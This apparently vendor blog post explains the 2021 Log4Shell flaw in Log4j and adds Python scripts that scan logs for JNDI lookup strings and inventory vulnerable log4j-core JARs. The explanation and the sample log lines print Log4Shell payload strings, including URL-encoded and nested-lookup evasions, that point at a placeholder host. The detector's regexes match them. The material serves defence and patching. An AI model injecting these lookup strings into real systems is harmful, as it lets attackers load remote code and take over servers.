"Not another cybersecurity attack?!"
(First, let me preface this blog by stating that as of today, December 22, 2021, no CMS Imaging systems have been impacted by the Log4j vulnerability.)
Yes, last week it became evident that researchers had identified another large-scale cybersecurity issue. This time the problem is not malware but a critical vulnerability (tracked as CVE-2021-44228) in a Java library named Apache Log4j. Log4j is a free tool that an enormous number of software programs use to write their log messages, in places like your hospital network, personal cloud storage, and, unfortunately, medical equipment and software. The vulnerability, and the attacks that exploit it, are being called Log4Shell, and many security professionals consider it one of the most serious and far-reaching vulnerabilities in years.
Most software today is developed using a mixture of frameworks and libraries. (Please note that the following example is overly simplified and will probably make a software developer's head explode, but I will use it for ease of understanding.) For example, if you wanted to write a piece of software to access a personal picture vault, you might first use a Single Sign-On service such as Okta or JumpCloud to sign in to your vault. Then, once inside your picture vault, you'd want to store and access your pictures, so you might use the Storage Access Framework on Android or PhotoKit on Apple, depending on your platform. If you wanted to share an image, you might use a messaging protocol such as XMPP or a service such as CoCam. Lastly, if you wanted to know when you last signed in, or whether your friend opened the image you shared, you would use a logging library such as Log4j (in Java programs) to record everything your software does. The point is that none of those pieces were written by you, and a flaw in any one of them becomes a flaw in your product.
Security professionals believe hackers have been exploiting the bug since the beginning of December. Still, the general public only became aware of it last week, because the frequency and depth of the attacks increased dramatically last week. Companies such as Microsoft, Google Cloud, Apple (iCloud), Amazon Web Services, and Cisco have all confirmed that some of their products or services were affected.
The flaw itself is frighteningly simple to trigger. When a vulnerable version of Log4j writes a log message, it looks for special "lookup" strings of the form ${...} inside the text and evaluates them. One kind of lookup, ${jndi:ldap://some-host/...}, tells the server to contact a remote host and load whatever Java code that host hands back. So any text an attacker controls that ends up in a log line, such as an email header, an account username, a browser's User-Agent string, or a search query, can carry that string and hand the attacker control of the server. The scariest part is that nobody has to click anything: an email only has to be delivered to a mail server that logs its headers with Log4j. For a simpler picture, imagine typing the malicious string into a website's search bar. The site looks for a matching page, fails to find one, and logs a 404 "page not found" error that includes your search text. If the website uses a vulnerable version of Log4j, that one log line is enough: if you are evil and have bad intent, you have just hacked that server. (In practice attackers hide the string behind URL encoding and nested lookups, so simply searching your logs for the word "jndi" is not enough.)
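How a practitioner would hunt for the lookup string in their own logs, as an added example that is not part of the original post. The log lines are constructed for the demonstration (addresses come from the reserved 203.0.113.0/24 documentation range), and the normalization covers only the most common evasions seen in the wild (repeated URL encoding, and ${lower:}, ${upper:} and ${...:-x} nesting), not every possible variant.

```python
import re
import urllib.parse

# Constructed sample log lines (not from any real system).  The first three carry
# Log4Shell-style lookup strings in plain, nested-lookup and URL-encoded forms;
# the last two are benign and must not be flagged.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /search?q=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 404 -',
    'User-Agent: ${${lower:j}ndi:${lower:l}dap://203.0.113.9/x}',
    'GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1',
    '203.0.113.7 - - [10/Dec/2021:14:02:12 +0000] "GET /search?q=cardiology HTTP/1.1" 200 512',
    'X-Api-Version: 1.2.3 note=${price}',
]

# Inner lookups that attackers nest inside "${jndi:...}" so the literal text never
# contains "jndi": ${lower:j} -> j, ${upper:j} -> J, ${::-j} -> j, ${env:NO_SUCH:-j} -> j.
_INNER_LOOKUP = re.compile(
    r"\$\{(?:(?:lower|upper):([^${}]*)|(?:[a-z]*:)?[^${}]*:-([^${}]*))\}", re.I
)
# The outer lookup that triggers the JNDI fetch; the protocol is captured for reporting.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.I)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo the common evasions before matching: repeated URL-decoding and
    collapsing of nested lookups that evaluate to a fixed string."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        collapsed = _INNER_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), decoded
        )
        if collapsed == text:
            break
        text = collapsed
    return text


def detect_log4shell(line: str):
    """Return the JNDI protocol (e.g. 'ldap') if the line carries a lookup string, else None."""
    m = _JNDI_LOOKUP.search(normalize(line))
    return m.group(1).lower() if m else None


def scan_lines(lines):
    """Return (line_number, protocol) for every flagged line, numbered from 1."""
    hits = []
    for n, line in enumerate(lines, start=1):
        proto = detect_log4shell(line)
        if proto:
            hits.append((n, proto))
    return hits


if __name__ == "__main__":
    for n, proto in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {n}: possible Log4Shell probe via {proto}")
```

A hit in the logs means a probe reached the server, not that it succeeded; the follow-up is to check whether that host ran a vulnerable Log4j at the time and whether it made any outbound LDAP, RMI or DNS connections to the address named in the string.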
Think of Log4Shell as a key to the front door of your server. Once inside, attackers can virtually lock the doors behind them by changing the passwords to your servers, downloading credentials, or installing cryptocurrency-mining bots. Since they hold the keys to the castle, they can also download all of the information stored on those servers, such as Protected Health Information (PHI). While most large tech companies have already applied fixes to prevent further incursion, many smaller companies do not have the resources to move as quickly. So far, the Log4j exploit has mostly been used to install cryptocurrency miners, with a few instances of ransomware. Most disturbingly, there are reports that hacking groups working on behalf of particular nation-states are targeting other national governments and infrastructure.
The next phase of this nightmare is bad actors running automated scans for vulnerable systems and then inserting malware into them by any of a number of routes; that kind of scanning is already under way. Once they have exploited a particular server, they can infect it with malware or, worse, sell that access to even worse entities, who may quietly monitor and download information from it indefinitely, holding it hostage until the vulnerability is finally fixed.
As you can imagine, the Apache Software Foundation has already released fixed versions of Log4j that close this hole (2.17.0 for current Java, with backports for older Java releases), and the vulnerability does not affect the old Log4j 1.x line. But the danger is not over. To stop this attack, security engineers need to inventory all of the software and servers that a business or government entity uses, identify which of them contain Log4j, and then patch or mitigate each instance. Think about all of the passwords you have accumulated in your lifetime, each tied to a different application or server; now imagine having to check every one of those systems for a library you never knowingly installed. Because Log4j is open source and free, it is bundled invisibly inside countless commercial products, so there is no way to estimate how many programs use it as their logging framework. In practice that means asking every vendor (medical-device and imaging vendors included) for a statement, scanning file systems for log4j-core JAR files, including ones nested inside other JARs and WARs, and, where an upgrade is not yet possible, removing the JndiLookup class from the JAR as Apache recommends rather than relying on a configuration flag alone.
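An added example (not from the original post or from CMS Imaging) of the inventory step described above: a Python script that walks a directory tree, opens every JAR/WAR/EAR it finds, reads the log4j-core version from the library's Maven metadata, checks whether the JndiLookup class is still present, and recurses into archives nested inside other archives. It builds its own constructed sample tree in a temporary directory so it runs offline; the sample files are stand-ins that contain only the two entries the scanner inspects, not real Log4j builds, and the fixed-version table reflects Apache's guidance as of December 2021.

```python
import io
import os
import tempfile
import zipfile

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# First fully fixed release per Log4j 2 branch, as published by Apache in December 2021:
# 2.17.0 for the main line, with backports 2.12.3 (Java 7) and 2.3.1 (Java 6).
FIXED_BY_BRANCH = {(2, 3): (2, 3, 1), (2, 12): (2, 12, 3)}
FIXED_MAINLINE = (2, 17, 0)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a pre-release suffix such as '-beta9' is dropped."""
    parts = [int(p) for p in text.split("-")[0].split(".")[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def classify(version, jndi_lookup_present):
    """Status of one log4j-core: 'not-affected', 'fixed', 'mitigated' or 'vulnerable'."""
    v = parse_version(version)
    if v < (2, 0, 0):  # Log4j 1.x is not subject to CVE-2021-44228 (it is end-of-life, though)
        return "not-affected"
    if v >= FIXED_BY_BRANCH.get(v[:2], FIXED_MAINLINE):
        return "fixed"
    if not jndi_lookup_present:  # JndiLookup.class deleted from the jar: Apache's approved workaround
        return "mitigated"
    return "vulnerable"


def scan_archive(data, name, findings):
    """Inspect one archive held in memory and recurse into any archives nested inside it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if POM_PROPERTIES in names:
            props = zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines()
            version = next((l.split("=", 1)[1].strip() for l in props if l.startswith("version=")), None)
            if version:
                findings.append((name, version, classify(version, JNDI_LOOKUP_CLASS in names)))
        elif JNDI_LOOKUP_CLASS in names:
            # log4j-core repackaged without its Maven metadata: version unknown, needs manual review
            findings.append((name, "unknown", "review"))
        for inner in sorted(names):
            if inner.lower().endswith(ARCHIVE_SUFFIXES):
                scan_archive(zf.read(inner), f"{name}!{inner}", findings)


def scan_tree(root):
    """Walk a directory tree and return (archive, version, status) for every log4j-core found."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), path, findings)
    return findings


def build_sample_jar(target, version, include_jndi_lookup=True):
    """Write a constructed stand-in for log4j-core-<version>.jar (to a path or file object)
    holding only the two entries this scanner inspects; it is not a real Log4j build."""
    with zipfile.ZipFile(target, "w") as zf:
        zf.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only


def build_demo_tree():
    """Create a temporary tree of constructed archives covering the cases that matter."""
    root = tempfile.mkdtemp(prefix="log4j-demo-")
    lib = os.path.join(root, "app", "WEB-INF", "lib")
    os.makedirs(lib)
    build_sample_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1")          # vulnerable
    build_sample_jar(os.path.join(root, "log4j-core-2.17.0.jar"), "2.17.0")         # fixed
    build_sample_jar(os.path.join(root, "log4j-core-2.11.0.jar"), "2.11.0", False)  # class removed
    # A fat application jar with log4j-core nested inside it: the case a filename search misses.
    nested = io.BytesIO()
    build_sample_jar(nested, "2.12.1")
    with zipfile.ZipFile(os.path.join(root, "viewer-app.jar"), "w") as zf:
        zf.writestr("BOOT-INF/lib/log4j-core-2.12.1.jar", nested.getvalue())
    return root


if __name__ == "__main__":
    for archive, version, status in scan_tree(build_demo_tree()):
        print(f"{status:12} log4j-core {version:8} {archive}")
```

Point scan_tree at a real installation directory to use it in earnest. It deliberately keys on the Maven metadata path and the JndiLookup class, so it will miss a log4j-core that a vendor relocated under a different package name, and it cannot see inside appliances you have no file-system access to; those still need a vendor statement.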
Unfortunately, we will continue to see new and different ways to exploit Log4Shell in the future, and according to Sean Gallagher, a senior threat researcher at cybersecurity company Sophos, "It's going to be around as long as the internet."
So let's keep our fingers crossed that Log4Shell does not play the role of the Grinch this holiday season and into 2022.